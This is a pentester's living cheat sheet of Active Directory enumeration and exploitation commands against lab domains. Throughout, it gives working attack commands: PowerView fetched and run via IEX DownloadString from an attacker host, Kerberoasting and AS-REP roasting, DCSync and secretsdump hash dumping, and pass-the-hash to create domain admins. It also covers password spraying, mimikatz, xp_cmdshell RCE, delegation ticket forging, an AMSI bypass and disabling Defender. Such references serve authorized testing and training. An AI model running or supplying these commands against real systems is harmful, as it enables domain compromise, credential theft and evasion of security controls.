Comment on page
Domain Enumeration + Exploitation
This is just a living document of things I have needed for domain enumeration/exploitation
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
Get-NetUser * -Domain corp.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset, lastlogontimestamp,accountexpires,admincount,userprincipalname, serviceprincipalname, mail,useraccountcontrol | Export-CSV users.csv
Get-NetComputer * -Domain corp.local | Select-Object -Property dnshostname,operatingsystem,operatingsystemservicepack,lastlogontimestamp | Export-CSV computers.csv
Get-DomainGroupMember -Identity "Helpdesk" | Select-Object membername
Get-DomainUser * -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Export-Csv .\ticket.csv -NoTypeInformation
PS C:\> Get-DomainObjectAcl -Identity it_admin -ResolveGUIDs ? { $_.SecurityIdentifier -Match $(ConvertTo-SID burmat) }
AceType : AccessAllowed
ObjectDN : CN=it_admin,CN=Users,DC=BURMAT,DC=CO
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2736429227-4547413232-2815246478-1130
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2736429227-4547413232-2815246478-1107
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
## scan an entire domain:
find-domainshare -computerdomain burmat.local
## narrow down scope, check permissions:
find-domainshare -computername websrv.burmat.local -computerdomain burmat.local -CheckShareAccess
PS C:\> $cred = New-Object System.Management.Automation.PSCredential "BURMAT\John.Smith", $(ConvertTo-SecureString "Spring2020!" -AsPlainText -Force);
PS C:\> find-domainshare -computername fs01.burmat.local -Credential $cred -computerdomain burmat.local -CheckShareAccess
WARNING: [Invoke-UserImpersonation] Executing LogonUser() with user: BURMAT\John.Smith
WARNING: [Invoke-RevertToSelf] Reverting token impersonation and closing LogonUser() token handle
Name Type Remark ComputerName
---- ---- ------ ------------
Accounting 0 fs01.burmat.local
Private 0 fs01.burmat.local
PS C:\windows\temp\.b> Invoke-UserImpersonation -Credential $cred
WARNING: [Invoke-UserImpersonation] Executing LogonUser() with user: BURMAT\John.Smith
6548
## now we can read the directory impersonating another user if permissions exist:
PS C:\> dir \\fs01.burmat.local\Private
"{7EA15487-7F5B-4CE3-C029-CEBE6FFE6D47}" | Get-DomainGPO
If you own the owner of another AD user object (
WriteOwner
, WriteDACL
, GenericWrite
, Owner
, etc), you can reset the password with ease:IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
$user = 'DOMAIN\owner_acct';
$pass= ConvertTo-SecureString 'Password123!' -AsPlainText -Force;
$creds = New-Object System.Management.Automation.PSCredential $user, $pass;
$newpass = ConvertTo-SecureString 'burmatw@sh3r3' -AsPlainText -Force;
Set-DomainUserPassword -Identity 'DOMAIN\vuln_user' -AccountPassword $newpass -Credential $creds;
Or if you can set yourself as owner, the following will do:
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
Set-DomainObjectOwner -Identity it_admin -OwnerIdentity burmat
Add-DomainObjectAcl -TargetIdentity it_admin -PrincipalIdentity burmat
$newpass = ConvertTo-SecureString -String 'burmat123$' -AsPlainText -Force
Set-DomainUserPassword -Identity it_admin -AccountPassword $newpass
Do you have
WriteDACL
to a domain? Give DCSync rights to an unprivileged domain user account:Add-DomainObjectAcl -TargetIdentity "DC=burmatco,DC=local" -PrincipalIdentity useracct1 -Rights DCSync
And use these rights to dump the hashes from the domain:
meterpreter > dcsync_ntlm BURMATCO\\useracct1
Attempt to get TGTs for users that have
UF_DONT_REQUIRE_PREAUTH
set:python GetNPUsers.py -request -no-pass -dc-ip 10.10.10.123 burmat.co/ -usersfile users.txt
Attack a local offline copy of NTDS.dit:
./secretsdump.py -ntds /root/l00t/ntds.dit -system /root/l00t/systemhive LOCAL
Or you can attack a system remotely:
./secretsdump.py -just-dc-ntlm burmat.co/[email protected]
Leverage this script to grab usernames via LDAP
./GetADUsers.py -all -no-pass -dc-ip 10.10.10.123 burmat.co/ | cut -d " " -f 1 | grep -Ev 'Name|Impacket|\-\-|\[' >> users.txt
Because hashes are just as good:
## create a new user
crackmapexec smb 10.10.10.123 -u 'administrator' -d 'burmat.co' -H 'd7452863d1e8e15241nn50ceb1ab9dfe' -x 'net user burmat Pwn3dPwn3d! /add /domain'
## add user to domain admins group
crackmapexec smb 10.10.10.123 -u 'administrator' -d 'burmat.co' -H 'd7452863d1e8e15241nn50ceb1ab9dfe' -x 'net group "Domain Admins" /add burmat /domain'
Switch out usernames/passwords/targets with lists:
## to spray that Spring2020! and a list of users against a list of targets:
crackmapexec smb ~/targets.txt -u ~/users.txt -p Spring2020! -d burmat.co
## mimikatz module
crackmapexec smb 10.10.10.123 -u 'administrator' -d 'burmat.co' -p 'S3cur3PW123' -M mimikatz -o COMMAND='privilege::debug'
## SAM database
crackmapexec smb 10.10.10.123 -u 'administrator' -d 'burmat.co' -p 'S3cur3PW123' --sam
GitHub Repo: https://github.com/NetSPI/PowerUpSQL and more thorough cheat sheet: https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet
## basic instance information
Get-SQLInstanceLocal
## more verbose information:
Get-SQLServerInfo -Verbose -Instance SQLSRV\SQLEXPRESS
## crawl for databse links:
Get-SqlServerLinkCrawl -Verbose -Instance SQLSRV\SQLEXPRESS
Get-SqlServerLinkCrawl -Verbose -Instance SQLSRV\SQLEXPRESS -Query "select name from master..sysdatabases" | Select-Object -ExpandProperty CustomQuery
## enable xp_cmdshell:
Get-SQLQuery -Instance SQLSRV\SQLEXPRESS -query "EXECUTE('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT ""sqlsrv.burmat.local"""
## test rce:
Get-SQLServerLinkCrawl -Instance "SQLSRV\SQLEXPRESS" -Query "exec master..xp_cmdshell 'whoami'" | Select-Object -ExpandProperty CustomQuery
nmap -v -Pn -p 88 --script krb5-enum-users.nse --script-args "realm='burmat.co', userdb='users.txt'" 10.10.10.123
If we have
GenericWrite
privileges over a host and we are a user that has an SPN, we can write our SID to the msDS-AllowedToActOnBehalfOfOtherIdentity
property against the AD object and forge tickets as anyone we like. You can read more about it here: https://alsid.com/company/news/kerberos-resource-based-constrained-delegation-new-control-path## we can write our delegation attribute to the DC with the following:
$UserSid = Get-DomainUser svc_burmat -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($UserSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer websrv.burmat.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
## now we can use rubeus to forge tickets as anyone we want:
./rubeus.exe s4u /user:svc_burmat /ticket:doIFFDCCBRCg... SNIP .. /impersonateuser:administrator /msdsspn:cifs/websvr.burmat.local /ptt
./rubeus.exe kerberoast /creduser:burmat.co\xsvc /credpassword:S3cur3PW123 /outfile:user.hash
./GetUserSPNs.py -request -dc-ip 10.10.10.123 burmat.co/xsvc:S3cur3PW123
hashcat -m 13100 hash.txt -a 0 /usr/share/wordlists/rockyou.txt --force
IEX(New-Object Net.WebClient).downloadString('http://10.10.15.123/ps/PowerView.ps1');
$securePassword = ConvertTo-SecureString 'S3cur3PW123' -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential('burmat.co\xsvc', $securePassword);
Get-DomainUser -Credential $credential -Server dc01.burmat.co -SPN | Get-DomainSPNTicket -Credential $credential -OutputFormat Hashcat
From a host with unconstrained delegation, "the printer bug" and dementor.py can be used to cause a TGT relay from the target host to us running responder, so we can generate a TGS for any user on that target host:
## set up a relay with responder:
responder -I tun0 --lm # tun0 = 10.10.15.123
## execute exploit through:
proxychains python dementor.py -u xsvc -p 'S3cur3PW123' -d 'burmat.co' 10.10.15.123 10.10.10.123
IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.123/ps/SharpHound.ps1');
Invoke-BloodHound -CollectionMethod All -CompressData -SkipPing;
Below are some useful LDAP queries that will help you enumerate a system. Some of them require a valid username/password to get more information. My go-to for these queries is
ldapsearch
. Null session:
ldapsearch -x -h 10.10.10.123 -D '' -w '' -b "DC=BURMAT,DC=CO"
Authenticated:
ldapsearch -LLL -x -H ldap://burmat.co -D "svc-burmat" -w "burmat123$" -b "dc=burmat,dc=co" "<LDAP QUERY HERE>"
Get usernames into a list by enumerating user objects:
ldapsearch -x -h burmat.co -b "dc=burmat,dc=co" -s sub "(objectclass=user)" | grep sAMAccountName | cut -d " " -f 2 > users.txt
## ldap filter to find accounts susceptible to this:
"(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
## generate a list of user accounts and use impacket to exploit:
python GetNPUsers.py -request -no-pass -dc-ip 10.1.1.123 burmat.co/ -usersfile users.txt
## and if you get a ticket, you can crack it:
hashcat -m 18200 -a 0 --force user.hash /usr/share/wordlists/rockyou.txt
"(&(&(servicePrincipalName=*) (UserAccountControl:1.2.840.113556.1.4.803:=512)) (!(UserAccountControl:1.2.840.113556.1.4.803:=2)))"
## if you get valid domain credentials, you can dump them w/ impacket for offline cracking:
python GetUserSPNs.py -request burmat.co/svc-burmat:burmat123$
# user:
"(&(&(objectCategory=person) (objectClass=user)) (userAccountControl:1.2.840.113556.1.4.803:=524288))"
# computer:
"(&(objectCategory=computer) (objectClass=computer) (userAccountControl:1.2.840.113556.1.4.803:=524288))"
"(&(objectClass=user) (memberof:1.2.840.113556.1.4.1941:=CN=Domain Admins,CN=Users,DC=burmat,DC=co))"
"objectClass=groupPolicyContainer"
# is av enabled:
PS C:\> Get-MpComputerStatus
# applocker rules:
PS C:\> $a = Get-ApplockerPolicy -effective
PS C:\> $a.rulecollections
# constrained?:
PS C:\> $ExecutionContext.SessionState.LanguageMode
PowerShell disabled for you? Try running the 32-bit copy of it:
C:\windows\syswow64\windowspowershell\v1.0\powershell whoami
Try putting your payload in one of the following directories:
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
If you run
whoami /priv
and you see SeDebugPrivilege
set to Enabled
, you can assume you already have SYSTEM. . .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(7864,'C:\temp\burmat443.exe');
You can also gain a MSF session and use the module
windows/manage/payload_inject
with a PID of your choice.PS C:\> Set-itemproperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -value 0
PS C:\> Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -value 1
PS C:\> Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
# list shared folders
PS> Get-WmiObject -Class Win32_Share -Computer dc1.burmat.co